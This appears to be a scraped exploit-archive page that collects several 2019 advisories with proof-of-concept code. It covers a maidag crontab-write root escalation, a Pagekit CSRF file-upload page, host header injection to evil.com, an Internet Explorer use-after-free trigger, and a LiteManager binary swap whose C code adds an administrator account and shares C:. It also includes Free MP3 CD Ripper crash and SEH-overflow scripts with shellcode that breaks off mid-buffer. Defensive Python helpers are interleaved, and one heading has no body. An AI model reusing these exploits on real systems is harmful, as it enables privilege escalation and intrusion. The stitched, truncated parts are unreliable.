
GNU Mailutils 3.7 Privilege Escalation


GNU Mailutils versions 2.0 through 3.7 suffer from a local privilege escalation vulnerability.


MD5 | 3cd7ca09d51964b1583d6172f508e129

# Exploit Title: GNU Mailutils 3.7 - Local Privilege Escalation
# Date: 2019-11-06
# Exploit Author: Mike Gualtieri
# Vendor Homepage: https://mailutils.org/
# Software Link: https://ftp.gnu.org/gnu/mailutils/mailutils-3.7.tar.gz
# Version: 2.0 <= 3.7
# Tested on: Gentoo
# CVE : CVE-2019-18862

Title : GNU Mailutils / Maidag Local Privilege Escalation
Author : Mike Gualtieri :: https://www.mike-gualtieri.com
Date : 2019-11-06
Updated : 2019-11-20

Vendor Affected: GNU Mailutils :: https://mailutils.org/
Versions Affected: 2.0 - 3.7
CVE Designator: CVE-2019-18862


1. Overview

The --url parameter of the GNU Mailutils maidag utility (versions 2.0 through
3.7) can be abused to write to arbitrary files on the host operating system. By
default, maidag is installed with setuid root permissions, which can lead to
local privilege escalation through code/command execution by writing to the
system's crontab or to other root-owned files on the operating system.



2. Detail

As described by the project's homepage, "GNU Mailutils is a swiss army knife of
electronic mail handling. It offers a rich set of utilities and daemons for
processing e-mail".

Maidag, a mail delivery agent utility included in the suite, is by default
marked to execute with setuid (suid) root permissions.

The --url parameter of maidag can be abused to write to arbitrary files on the
operating system. Abusing this option while the binary is marked with suid
permissions allows a low privileged user to write to arbitrary files on the
system as root. Writing to the crontab, for example, may lead to a root shell.

The flaw itself appears to date back to the 2008-10-19 commit, when the --url
parameter was introduced to maidag.

11637b0f - New maidag mode: --url
https://git.savannah.gnu.org/cgit/mailutils.git/commit/?id=11637b0f262db62b4dc466cefb9315098a1a995a

maidag/Makefile.am:
chmod 4755 $(DESTDIR)$(sbindir)/$$i;\


The following payload executes arbitrary commands as root and works with
versions of maidag through version 3.7 (older releases need the syntax shown
further below).

maidag --url /etc/crontab < /tmp/crontab.in

The file /tmp/crontab.in would contain a payload like the following.

line 1:
line 2: */1 * * * * root /tmp/payload.sh

Please note: For the input to be accepted by maidag, the first line of the
file must be blank or be commented.

In the above example, the file /tmp/payload.sh would include arbitrary
commands to execute as root.


Older versions of GNU Mailutils (2.2 and previous) require a different syntax:

maidag --url 'mbox://user@localhost //etc/crontab'< /tmp/crontab.in



3. Solution

A fix for the flaw has been made in GNU Mailutils 3.8, which removes the maidag
utility and introduces three new utilities that replace its functionality.
Details about the new features can be found in the project's release notes:

https://git.savannah.gnu.org/cgit/mailutils.git/tree/NEWS

A workaround for those unable to upgrade is to remove the setuid bit from
/usr/sbin/maidag (e.g. `chmod u-s /usr/sbin/maidag`).

It should be noted that some Linux distributions already remove the suid bit
from maidag by default, nullifying this privilege escalation flaw.

A patch has also been made available by Sergey Poznyakoff and posted to the
GNU Mailutils mailing list; it removes the setuid bit from maidag in all but
the required cases. The patch is intended for users who cannot yet upgrade to
mailutils 3.8. The patch is also available here:
https://www.mike-gualtieri.com/files/maidag-dropsetuid.patch
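The following is an added example, not part of the advisory: a small audit helper for the interim workaround described above. It reports whether a maidag binary still carries the setuid bit and can apply the equivalent of `chmod u-s`; the default path /usr/sbin/maidag is the one the advisory names, and the temp-file demo stands in for a packaged binary installed with mode 4755 as in the Makefile.am rule quoted earlier.

```python
import os
import stat
import tempfile

# Added example, not part of the advisory: audit helper for the interim
# workaround (drop the setuid bit from maidag when upgrading to GNU Mailutils
# 3.8 is not yet possible). /usr/sbin/maidag is the path the advisory names.
MAIDAG_DEFAULT = "/usr/sbin/maidag"


def setuid_state(path=MAIDAG_DEFAULT):
    """Return 'absent', 'setuid' or 'clean' for the binary at path."""
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return "absent"
    return "setuid" if st.st_mode & stat.S_ISUID else "clean"


def drop_setuid(path=MAIDAG_DEFAULT):
    """Apply the advisory's workaround (same effect as `chmod u-s`) and return the new state."""
    mode = stat.S_IMODE(os.stat(path).st_mode)
    os.chmod(path, mode & ~stat.S_ISUID)
    return setuid_state(path)


def audit(path=MAIDAG_DEFAULT):
    """Classify the installed maidag and say what to do about it."""
    state = setuid_state(path)
    if state == "setuid":
        advice = ("exposed to CVE-2019-18862 if the version is 3.7 or older: "
                  "upgrade to GNU Mailutils 3.8 or run 'chmod u-s %s'" % path)
    elif state == "clean":
        advice = "setuid bit not set; the local privilege escalation does not apply"
    else:
        advice = "maidag is not installed"
    return {"path": path, "state": state, "advice": advice}


def demo_on_temp_file():
    """Exercise the checks on a throwaway file marked 4755, as a packaged maidag is.

    Returns (state_before, state_after, mode_after)."""
    fd, path = tempfile.mkstemp(prefix="maidag-demo-")
    os.close(fd)
    try:
        os.chmod(path, 0o4755)          # the mode the Makefile.am rule installs
        before = audit(path)["state"]
        after = drop_setuid(path)
        mode_after = stat.S_IMODE(os.stat(path).st_mode)
    finally:
        os.unlink(path)
    return before, after, mode_after


if __name__ == "__main__":
    print(audit())                      # check the real system path
    print(demo_on_temp_file())          # ('setuid', 'clean', 493)
```

The demo only touches a file it creates itself; `audit()` on the real path is read-only, and `drop_setuid()` on /usr/sbin/maidag needs root, exactly like the `chmod u-s` it mirrors.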



4. Additional Comments

This vulnerability disclosure was submitted to MITRE Corporation for inclusion
in the Common Vulnerabilities and Exposures (CVE) database. The designator
CVE-2019-18862 has been assigned.

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-18862
https://nvd.nist.gov/vuln/detail/CVE-2019-18862

The NIST National Vulnerability Database (NVD) has assigned the following
ratings:

CVSS 3.x Severity and Metrics: Base Score: 7.8 HIGH
CVSS 2.0 Severity and Metrics: Base Score: 4.6 MEDIUM

This disclosure will be updated as new information becomes available.



5. History

2019-10-09 Informed Sergey Poznyakoff <gray@gnu.org.ua> of security issue

2019-10-10 Reply from Sergey acknowledging the issue

2019-10-12 Fix available in the GNU Mailutils git repository:
739c6ee5 - Split maidag into three single-purpose tools
https://git.savannah.gnu.org/cgit/mailutils.git/commit/?id=739c6ee525a4f7bb76b8fe2bd75e81a122764ced

2019-11-06 GNU Mailutils Version 3.8 released to close the issue

2019-11-06 Submission of this vulnerability disclosure to the MITRE Corporation to
obtain a CVE designator

2019-11-07 Patch offered by Sergey for those unable to upgrade to version 3.8

2019-11-11 CVE-2019-18862 assigned to flaw

2019-11-20 Vulnerability disclosure made publicly available


Pagekit CMS 1.0.17 Cross Site Request Forgery


Pagekit CMS version 1.0.17 suffers from a cross site request forgery vulnerability.


MD5 | 46229d9ac3cd2137bc8f46cfaabb010d

Title:
====

Pagekit CMS 1.0.17 Cross-Site Request Forgery (CSRF) vulnerability


Credit:
======

Name: Christian Bortone


CVE:
====

CVE-2019-19013


Date:
====

11/18/2019 (dd/mm/yyyy)


Vendor:
======

Pagekit is a modern and lightweight open source CMS.

Vendor link: https://pagekit.com/


Vulnerable Product:
==============

Pagekit CMS 1.0.17


Abstract:
=======

A Cross-Site Request Forgery (CSRF) vulnerability in Pagekit 1.0.17 could allow an attacker to upload an arbitrary file by removing the CSRF token from the request.


Exploitation-Technique:
===================

Remote


Severity Rating (CVSS):
===================

4.6 (Medium) (CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N)


Details:
=======

A Cross-Site Request Forgery (CSRF) vulnerability was discovered in Pagekit CMS which allows a remote attacker to upload forged files to the server without the victim's knowledge by enticing an authenticated user to visit an attacker-controlled page/URL. The specific flaw exists within the handling of the file upload request in the store section. The application fails to validate the CSRF token on the POST request (the token can be removed from the request). The request also contains a second token (the WebKitFormBoundary) that is not tied to the user's session. An attacker with lower privileges on the system can carry out a CSRF attack.

Vulnerable module/page/application: /site/storage (upload file)


PoC Exploit code:
----------------------------------------------------------------------------

<html>
<body>
<script>history.pushState('', '', '/')</script>
<script>
function submitRequest()
{
    var xhr = new XMLHttpRequest();
    xhr.open("POST", "http:\/\/localhost\/pagekit\/system\/finder\/upload", true);
    xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=----WebKitFormBoundaryJze564AoGkbRRRUz");
    xhr.setRequestHeader("Accept", "*\/*");
    xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.9");
    xhr.withCredentials = true;
    var body = "------WebKitFormBoundaryJze564AoGkbRRRUz\r\n" +
        "Content-Disposition: form-data; name=\"files[]\"; filename=\"test.jpg\"\r\n" +
        "Content-Type: image/jpeg\r\n" +
        "\r\n" +
        "\r\n" +
        "------WebKitFormBoundaryJze564AoGkbRRRUz\r\n" +
        "Content-Disposition: form-data; name=\"path\"\r\n" +
        "\r\n" +
        "/\r\n" +
        "------WebKitFormBoundaryJze564AoGkbRRRUz\r\n" +
        "Content-Disposition: form-data; name=\"root\"\r\n" +
        "\r\n" +
        "storage\r\n" +
        "------WebKitFormBoundaryJze564AoGkbRRRUz\r\n" +
        "Content-Disposition: form-data; name=\"_csrf\"\r\n" +
        "\r\n" +
        "\r\n" +
        "------WebKitFormBoundaryJze564AoGkbRRRUz--\r\n";
    var aBody = new Uint8Array(body.length);
    for (var i = 0; i < aBody.length; i++)
        aBody[i] = body.charCodeAt(i);
    xhr.send(new Blob([aBody]));
}
submitRequest();
</script>
<form action="#">
<input type="button" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>


----------------------------------------------------------------------------
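As an added defensive example (not part of the advisory and not Pagekit's code), the check that the advisory says the upload endpoint lacks: parse the multipart body, require a non-empty `_csrf` field, and compare it in constant time with the token stored in the user's session. The session layout, the token value and the request body are constructed here; the body carries the same parts as the PoC above (files[], path, root, _csrf), including the empty `_csrf` that the PoC sends.

```python
import hmac
import re
import secrets

# Added example, not Pagekit's code: server-side CSRF validation for a
# multipart upload. Session layout {"csrf_token": ...} is an assumption.


def new_session():
    """Create a session carrying a fresh random CSRF token."""
    return {"csrf_token": secrets.token_hex(32)}


def parse_multipart(body: bytes, boundary: str):
    """Minimal multipart/form-data parser returning (fields, files).

    Enough for the example; production code should use a vetted library."""
    delimiter = b"--" + boundary.encode()
    fields, files = {}, []
    for part in body.split(delimiter):
        if part in (b"", b"\r\n", b"--", b"--\r\n"):   # preamble / closing delimiter
            continue
        head, sep, value = part.partition(b"\r\n\r\n")
        if not sep:
            continue
        if value.endswith(b"\r\n"):
            value = value[:-2]
        m = re.search(rb'name="([^"]*)"(?:;\s*filename="([^"]*)")?', head)
        if not m:
            continue
        name = m.group(1).decode("utf-8", "replace")
        if m.group(2) is not None:
            files.append({"field": name, "filename": m.group(2).decode("utf-8", "replace"),
                          "data": value})
        else:
            fields[name] = value.decode("utf-8", "replace")
    return fields, files


def check_upload(headers: dict, body: bytes, session: dict):
    """Decide whether a POST to the upload endpoint may proceed."""
    content_type = headers.get("Content-Type", "")
    m = re.search(r"boundary=([^;]+)", content_type)
    if not m:
        return {"ok": False, "status": 400, "reason": "not multipart/form-data"}
    fields, files = parse_multipart(body, m.group(1).strip())
    submitted = fields.get("_csrf", "")
    expected = session.get("csrf_token", "")
    # An absent or empty token is rejected outright; a present one is compared in
    # constant time. The WebKitFormBoundary string is chosen by the client and is
    # no substitute for a session-bound token.
    if (not submitted or not expected
            or not hmac.compare_digest(submitted.encode(), expected.encode())):
        return {"ok": False, "status": 403, "reason": "missing or invalid _csrf token"}
    if not files:
        return {"ok": False, "status": 400, "reason": "no file part"}
    return {"ok": True, "status": 200, "files": [f["filename"] for f in files]}


# Constructed request data with the same parts as the advisory's PoC;
# the token value is made up for the example.
BOUNDARY = "----WebKitFormBoundaryJze564AoGkbRRRUz"
HEADERS = {"Content-Type": "multipart/form-data; boundary=" + BOUNDARY}
SESSION = {"csrf_token": "constructed-token-0123456789abcdef"}


def build_upload_body(csrf_value: str, boundary: str = BOUNDARY) -> bytes:
    d = ("--" + boundary).encode()
    return b"".join([
        d + b'\r\nContent-Disposition: form-data; name="files[]"; filename="test.jpg"\r\n'
            b'Content-Type: image/jpeg\r\n\r\n\r\n',
        d + b'\r\nContent-Disposition: form-data; name="path"\r\n\r\n/\r\n',
        d + b'\r\nContent-Disposition: form-data; name="root"\r\n\r\nstorage\r\n',
        d + b'\r\nContent-Disposition: form-data; name="_csrf"\r\n\r\n' + csrf_value.encode() + b'\r\n',
        d + b'--\r\n',
    ])


if __name__ == "__main__":
    print(check_upload(HEADERS, build_upload_body(""), SESSION))                     # 403
    print(check_upload(HEADERS, build_upload_body(SESSION["csrf_token"]), SESSION))  # 200
```

The forged request from the PoC (empty `_csrf`) is refused with 403 before any file is touched, while the same body carrying the session's token passes.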

Network Management Card 6.2.0 Host Header Injection


Network Management Card version 6.2.0 suffers from a host header injection vulnerability.


MD5 | 3a2ad46f90883b9f9f684a3ed51ff8a8

# Exploit Title: Network Management Card 6.2.0 - Host Header Injection
# Google Dork:
# Date: 2019-11-21
# Exploit Author: Amal E Thamban,Kamal Paul
# Vendor Homepage: https://www.apc.com/in/en/
# Software Link: https://www.apc.com/shop/in/en/products/Network-Management-Card
# Version: v6.2.0
# Tested on: Kali Linux
# CVE :


Description: Host Header Injection

The product is vulnerable to host header injection: the Host header can be changed to a value outside the target domain (e.g. evil.com) and the server then redirects to that domain instead.
-------------------------------------------------------------------------------------------------------------------------
Original request
GET / HTTP/1.1
Host: 192.168.10.211
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.10.211/logon.htm
Connection: close
Cookie: C0=apc
Upgrade-Insecure-Requests: 1
--------------------------------------------------------------------------------------------------------------------------
Modified request

GET / HTTP/1.1
Host: evil.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.10.211/logon.htm
Connection: close
Cookie: C0=apc
Upgrade-Insecure-Requests:
---------------------------------------------------------------------------------------------------------------------------
Response

HTTP/1.1 303 See Other
Location: http://evil.com/home.htm
Content-Length: 0
WebServer:
Connection: close
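An added example, not the vendor's code: a redirect builder that only ever takes the host part of a Location from an administrator-configured allowlist, with a small request parser so the two requests above can be replayed against it offline. The allowlist entries, the 421 status for an unknown Host, and the two sample requests are constructed for this example.

```python
from urllib.parse import urlsplit

# Added example, not the vendor's code. ALLOWED_HOSTS is a constructed allowlist
# of names/addresses the device is actually reachable under.
ALLOWED_HOSTS = {"192.168.10.211", "nmc.example.internal"}


def normalize_host(host_header: str):
    """Return (hostname, port) parsed from a Host header, or None when malformed."""
    if not host_header or not host_header.strip():
        return None
    try:
        parts = urlsplit("//" + host_header.strip())   # host, host:port, [v6]:port
        host, port = parts.hostname, parts.port
    except ValueError:
        return None
    return (host.lower(), port) if host else None


def redirect_location(host_header, path, allowed=ALLOWED_HOSTS, scheme="http"):
    """Build an absolute Location only when the Host header is on the allowlist."""
    parsed = normalize_host(host_header)
    if parsed is None or parsed[0] not in allowed:
        return None
    host, port = parsed
    netloc = host if port is None else "%s:%d" % (host, port)
    if not path.startswith("/") or path.startswith("//"):
        path = "/"                                      # never a protocol-relative target
    return "%s://%s%s" % (scheme, netloc, path)


def parse_request(raw: str):
    """Split a raw HTTP/1.1 request into (method, target, lowercase-keyed headers)."""
    lines = raw.replace("\r\n", "\n").split("\n")
    method, target = lines[0].split(" ")[:2]
    headers = {}
    for line in lines[1:]:
        if not line.strip():
            break
        key, _, value = line.partition(":")
        headers[key.strip().lower()] = value.strip()
    return method, target, headers


def logon_redirect(raw_request: str):
    """Mimic the card's '303 to /home.htm' behaviour, but refuse unknown Hosts."""
    _, _, headers = parse_request(raw_request)
    location = redirect_location(headers.get("host", ""), "/home.htm")
    if location is None:
        # 421 Misdirected Request: the server is not configured for this Host
        return 421, {"Content-Length": "0"}
    return 303, {"Location": location, "Content-Length": "0"}


# Constructed requests modelled on the advisory's original and modified ones
GENUINE = "GET / HTTP/1.1\r\nHost: 192.168.10.211\r\nCookie: C0=apc\r\n\r\n"
TAMPERED = "GET / HTTP/1.1\r\nHost: evil.com\r\nCookie: C0=apc\r\n\r\n"

if __name__ == "__main__":
    print(logon_redirect(GENUINE))   # (303, {'Location': 'http://192.168.10.211/home.htm', ...})
    print(logon_redirect(TAMPERED))  # (421, {'Content-Length': '0'})
```

Where no allowlist is practical, the alternative is a relative Location (`/home.htm`), which browsers resolve against the URL they actually connected to, so the attacker-supplied Host never appears in the response.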

macOS update_dyld_shared_cache Privilege Escalation

Microsoft Internet Explorer Use-After-Free


Microsoft Internet Explorer suffers from a use-after-free vulnerability in JScript arguments during the toJSON callback.


MD5 | 9b1e32c7d5ecc6ef6b2e7b6e987d25b5

IE: Use-after-free in JScript arguments during toJSON callback

There is a use-after-free issue in JScript (triggerable via Internet Explorer) where the members of the 'arguments' object aren't tracked by the garbage collector during the 'toJSON' callback. Thus, during the 'toJSON' callback, it is possible to assign a variable to the 'arguments' object, have it garbage-collected (as long as it is not referenced anywhere else) and still access it later. Note that, like in some previously reported JScript issues, this is a use-after-free on a JScript variable (VAR structure), so in order to trigger a crash, the entire block of variables must be freed.

PoC for Internet Explorer is below. I tested it on multiple Windows versions with the latest security patches applied.

===========================================================

<!-- saved from url=(0014)about:internet -->
<meta http-equiv="X-UA-Compatible" content="IE=8"></meta>
<script language="Jscript.Encode">
var spray = new Array();

function F() {
alert('callback');

// 2. Create a bunch of objects
for (var i = 0; i < 20000; i++) spray[i] = new Object();

// 3. Store a reference to one of them in the arguments array
// The arguments array isn't tracked by garbage collector
arguments[0] = spray[5000];

// 4. Delete the objects and call the garbage collector
// All JSCript variables get reclaimed...
for (var i = 0; i < 20000; i++) spray[i] = 1;
CollectGarbage();

// 5. But we still have reference to one of them in the
// arguments array
alert(arguments[0]);
}

// 1. Cause toJSON callback to fire
var o = {toJSON:F}
JSON.stringify(o);

alert('done');

</script>

===========================================================


Debug log:

===========================================================

(1cf4.154): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000080 ebx=05ecc218 ecx=00000080 edx=00000001 esi=05f0c3c8 edi=05fb12e8
eip=6e25f52a esp=05ecc180 ebp=05ecc1b4 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
jscript!PrepareInvoke+0x12a:
6e25f52a 0fb707 movzx eax,word ptr [edi] ds:002b:05fb12e8=????

0:009> k
# ChildEBP RetAddr
00 05ecc1b4 6e262b75 jscript!PrepareInvoke+0x12a
01 05ecc2a8 6e2660ee jscript!VAR::InvokeByDispID+0x1c5
02 05ecc4a0 6e26244a jscript!CScriptRuntime::Run+0x2e4e
03 05ecc594 6e2622a1 jscript!ScrFncObj::CallWithFrameOnStack+0xaa
04 05ecc5ec 6e25bec9 jscript!ScrFncObj::Call+0x81
05 05ecc68c 6e262aed jscript!NameTbl::InvokeInternal+0x399
06 05ecc78c 6e2a862c jscript!VAR::InvokeByDispID+0x13d
07 05ecc800 6e2a8c2e jscript!GCProtectKeyAndCall+0xed
08 05ecc898 6e2a93ce jscript!JSONApplyFilters+0x125
09 05ecc90c 6e2ad9a2 jscript!JSONStringifyObject+0xac
0a 05ecc9b4 6e269e3a jscript!JsJSONStringify+0x382
0b 05ecca1c 6e25bec9 jscript!NatFncObj::Call+0xea
0c 05eccabc 6e25e476 jscript!NameTbl::InvokeInternal+0x399
0d 05eccc78 6e262aa5 jscript!VAR::InvokeByName+0x8f6
0e 05eccd70 6e2660ee jscript!VAR::InvokeByDispID+0xf5
0f 05eccf68 6e26244a jscript!CScriptRuntime::Run+0x2e4e
10 05ecd05c 6e2622a1 jscript!ScrFncObj::CallWithFrameOnStack+0xaa
11 05ecd0b4 6e257124 jscript!ScrFncObj::Call+0x81
12 05ecd170 6e257f75 jscript!CSession::Execute+0x314
13 05ecd1d0 6e256c83 jscript!COleScript::ExecutePendingScripts+0x2d5
14 05ecd274 6e2569b9 jscript!COleScript::ParseScriptTextCore+0x2c3
15 05ecd2a0 70209251 jscript!COleScript::ParseScriptText+0x29
16 05ecd2d8 70122a27 MSHTML!CActiveScriptHolder::ParseScriptText+0x51
17 05ecd348 70121fe2 MSHTML!CScriptCollection::ParseScriptText+0x182
18 05ecd434 701226ee MSHTML!CScriptData::CommitCode+0x312
19 05ecd4b0 7012153a MSHTML!CScriptData::Execute+0x1ba
1a 05ecd4d0 701e99b6 MSHTML!CHtmScriptParseCtx::Execute+0xaa
1b 05ecd524 70159c7d MSHTML!CHtmParseBase::Execute+0x186
1c 05ecd544 70159599 MSHTML!CHtmPost::Broadcast+0xfd
1d 05ecd66c 7017647d MSHTML!CHtmPost::Exec+0x339
1e 05ecd68c 70176376 MSHTML!CHtmPost::Run+0x3d
1f 05ecd6ac 70176308 MSHTML!PostManExecute+0x60
20 05ecd6c0 70176279 MSHTML!PostManResume+0x6f
21 05ecd6f0 70208447 MSHTML!CHtmPost::OnDwnChanCallback+0x39
22 05ecd708 7015be1d MSHTML!CDwnChan::OnMethodCall+0x27
23 05ecd780 702f1207 MSHTML!GlobalWndOnMethodCall+0x1bd
24 05ecd7d0 7015c5a2 MSHTML!GlobalWndProc_SEH+0x317
25 05ecd7ec 7562624b MSHTML!GlobalWndProc+0x52
26 05ecd818 756174dc USER32!_InternalCallWinProc+0x2b
27 05ecd8fc 7561661b USER32!UserCallWinProcCheckWow+0x3ac
28 05ecd970 756163f0 USER32!DispatchMessageWorker+0x21b
29 05ecd97c 717e6456 USER32!DispatchMessageW+0x10
2a 05ecfb0c 717e73e3 IEFRAME!CTabWindow::_TabWindowThreadProc+0xa36
2b 05ecfbcc 7223df6c IEFRAME!LCIETab_ThreadProc+0x403
2c 05ecfbe4 7130289d msIso!_IsoThreadProc_WrapperToReleaseScope+0x1c
2d 05ecfc1c 75520419 IEShims!NS_CreateThread::AutomationIE_ThreadProc+0x8d
2e 05ecfc2c 7789662d KERNEL32!BaseThreadInitThunk+0x19
2f 05ecfc88 778965fd ntdll!__RtlUserThreadStart+0x2f
30 05ecfc98 00000000 ntdll!_RtlUserThreadStart+0x1b

===========================================================


This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available (whichever is earlier), the bug
report will become visible to the public.


Related CVE Numbers: CVE-2019-1429.



Found by: ifratric@google.com


ProShow Producer 9.0.3797 Unquoted Service Path


ProShow Producer version 9.0.3797 suffers from an unquoted service path vulnerability.


MD5 | a4fc1181b21d3e5e515a569bbda70f74

#Exploit Title: ProShow Producer 9.0.3797 - ('ScsiAccess') Unquoted Service Path
#Exploit Author : ZwX
#Exploit Date: 2019-11-21
#Vendor Homepage : http://www.photodex.com/
#Link Software : http://files.photodex.com/release/pspro_90_3797.exe
#Tested on OS: Windows 7


#Analyze PoC :
==============


C:\Users\ZwX>sc qc ScsiAccess
[SC] QueryServiceConfig réussite(s)

SERVICE_NAME: ScsiAccess
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Photodex\ProShow Producer\ScsiAccess.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : ScsiAccess
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem

LiteManager 4.5.0 Insecure File Permissions


LiteManager version 4.5.0 suffers from an insecure file permission vulnerability.


MD5 | 45e9e64e6c97b86f690aef2d4b2f9485

# Exploit Title: LiteManager 4.5.0 - Insecure File Permissions
# Exploit Author: ZwX
# Exploit Date: 2019-11-21
# Vendor Homepage : LiteManager Team
# Software Link: http://html.tucows.com/preview/1594042/LiteManager-Free?q=remote+support
# Tested on OS: Windows 7


# Proof of Concept (PoC):
==========================


C:\Program Files\LiteManagerFree - Server>icacls *.exe
ROMFUSClient.exe Everyone:(F)
AUTORITE NT\Système:(I)(F)
BUILTIN\Administrateurs:(I)(F)
BUILTIN\Utilisateurs:(I)(RX)


#Exploit code(s):
=================

1) Compile the C code below and name the result "ROMFUSClient.exe":

#include <windows.h>
#include <stdlib.h>

int main(void)
{
    /* Runs with the privileges of whoever launches the replaced binary;
       the renamed original client is started afterwards. */
    system("net user hacker abc123 /add");
    system("net localgroup Administrators hacker /add");
    system("net share SHARE_NAME=c:\\ /grant:hacker,full");
    WinExec("C:\\Program Files\\LiteManagerFree\\~ROMFUSClient.exe", 0);
    return 0;
}

2) Rename the original "ROMFUSClient.exe" to "~ROMFUSClient.exe".
3) Place the malicious "ROMFUSClient.exe" in the LiteManagerFree directory.
4) Disconnect and wait for a more privileged user to connect and use the ROMFUSClient IDE.
Privilege escalation successful.
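The root cause here is the `Everyone:(F)` entry on an executable that a more privileged user later runs. As an added example (not LiteManager's code, and not part of the advisory), the following checker reads `icacls` output and flags executables that low-privilege principals may modify or replace. The sample listing is constructed to match the advisory's output, including the French principal names; the principal list covers English, French and Spanish names and is an assumption to extend per locale.

```python
import re

# Added example, not LiteManager's code: flag executables whose ACL lets a
# standard user change them. SAMPLE_ICACLS is constructed to match the advisory.
SAMPLE_ICACLS = """\
ROMFUSClient.exe Everyone:(F)
                 AUTORITE NT\\Système:(I)(F)
                 BUILTIN\\Administrateurs:(I)(F)
                 BUILTIN\\Utilisateurs:(I)(RX)
"""

# Principals every standard user belongs to (English plus French/Spanish names
# as printed by localized icacls). Constructed list; extend for other locales.
LOW_PRIV_PRINCIPALS = {
    "everyone", "tout le monde", "todos",
    "builtin\\users", "builtin\\utilisateurs", "builtin\\usuarios",
    "nt authority\\authenticated users", "nt authority\\interactive",
}
# icacls simple rights and specific rights that allow changing or replacing a file
WRITE_SIMPLE = {"F", "M", "W"}
WRITE_SPECIFIC = {"WD", "AD", "WA", "WEA", "DC", "WDAC", "WO", "DE"}
INHERITANCE_FLAGS = {"I", "OI", "CI", "IO", "NP"}

ACE_RE = re.compile(r"^(.*?):((?:\([^)]*\))+)\s*$")


def parse_icacls(output: str):
    """Yield (file, principal, tokens) for every ACE in icacls output.

    The first line of an entry carries the file name and the first ACE; icacls
    indents the remaining ACEs. File names containing spaces are not handled."""
    current = None
    for line in output.splitlines():
        if not line.strip():
            continue
        if not line[0].isspace():                      # a new file entry
            m = re.match(r"(\S+)\s+(.*)$", line)
            if not m:
                continue
            current, ace = m.group(1), m.group(2)
        else:
            ace = line.strip()
        m = ACE_RE.match(ace)
        if not m or current is None:
            continue
        tokens = re.findall(r"\(([^)]*)\)", m.group(2))
        yield current, m.group(1), tokens


def grants_write(tokens) -> bool:
    """True if the ACE grants a right that lets the principal change the file."""
    if "DENY" in tokens:
        return False
    for tok in tokens:
        if tok in INHERITANCE_FLAGS:
            continue
        for right in tok.split(","):                   # e.g. "RX,W" or "DE,WD"
            if right.strip() in WRITE_SIMPLE or right.strip() in WRITE_SPECIFIC:
                return True
    return False


def weak_executables(output: str):
    """Return [(file, principal, rights)] where a low-privilege principal can modify the file."""
    findings = []
    for file, principal, tokens in parse_icacls(output):
        if principal.lower() in LOW_PRIV_PRINCIPALS and grants_write(tokens):
            findings.append((file, principal, "".join("(%s)" % t for t in tokens)))
    return findings


def remediation(file: str, principal: str) -> str:
    """icacls command that removes the offending grant entry."""
    return 'icacls "%s" /remove:g "%s"' % (file, principal)


if __name__ == "__main__":
    for file, principal, rights in weak_executables(SAMPLE_ICACLS):
        print(file, principal, rights, "->", remediation(file, principal))
```

Run it over `icacls *.exe` output from each service or auto-started program directory; an executable that a standard user can write to and a privileged user will run is the whole bug.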

Free MP3 CD Ripper 2.8 Buffer Overflow / Denial Of Service


Free MP3 CD Ripper version 2.8 suffers from a buffer overflow vulnerability that can trigger a denial of service condition.


MD5 | 7327fd046eaecae3084c3ca6500dd375

#Exploit Title : Free MP3 CD Ripper 2.8 Buffer Overflow (DOS)
#Date: 23-08-2019
#Vulnerable Software: FREE MP3 CD RIPPER 2.8 Build 20140611
#Vendor Home Page: www.cleanersoft.com/
#Software Link: www.cleanersoft.com/cd_ripper/free_cd_ripper.html
#Tested On: Windows 7 (64Bit)
#Attack Type : Denial of Service
#Impact : Code Execution
#Tested Version - 2.8

#Author - Malav Vyas

#Twitter - @malav_vyas1

#Contact - malavvyas98@gmail.com

"""
Steps to reproduce

[1] Run this python file and generate exploit.wav file
[2] Open Free Mp3 CD ripper on target and click on convert button
[3] select exploit.wav file
[4] w00t!! Application should crash, resulting in Denial of service

"""


#!/usr/bin/python

buffer = "A" * 6000

payload = buffer
try:
    f = open("exploit.wav", "w")
    print "[+] Creating %s bytes evil payload.." % len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"


Free MP3 CD Ripper 2.8 Buffer Overflow


Free MP3 CD Ripper version 2.8 suffers from a buffer overflow vulnerability.


MD5 | 5bac126cac6647e4c92b409087d833b7

#Exploit Title: Free MP3 CD Ripper 2.8 - '.mp3' Structured Exception Handler Buffer Overflow
# '.mp3 file'
# Author: Malav Vyas
# Twitter: @malav_vyas1
#Tested on Windows xp SP3 English
#Tested Version - 2.8 build 20140611
#Steps:
#Run the script it will generate exploit.mp3 file.
#Run Free MP3 CD Ripper 2.8 on windows xp sp3
# Click on Convert - and open "exploit.mp3"
# A calculator will pop up

#!/usr/bin/python

buffer = "A" * 4116

NSEH = "\xeb\x06\x90\x90"

SEH = "\x21\x21\xe4\x66"
nops = "\x90" * 8
#badchar \x00\x0a\x0d\x2f
#calculator
buf = ""
buf += "\xba\x9a\x98\xaf\x7e\xdd\xc2\xd9\x74\x24\xf4\x5f\x29"
buf += "\xc9\xb1\x31\x83\xc7\x04\x31\x57\x0f\x03\x57\x95\x7a"
buf += "\x5a\x82\x41\xf8\xa5\x7b\x91\x9d\x2c\x9e\xa0\x9d\x4b"
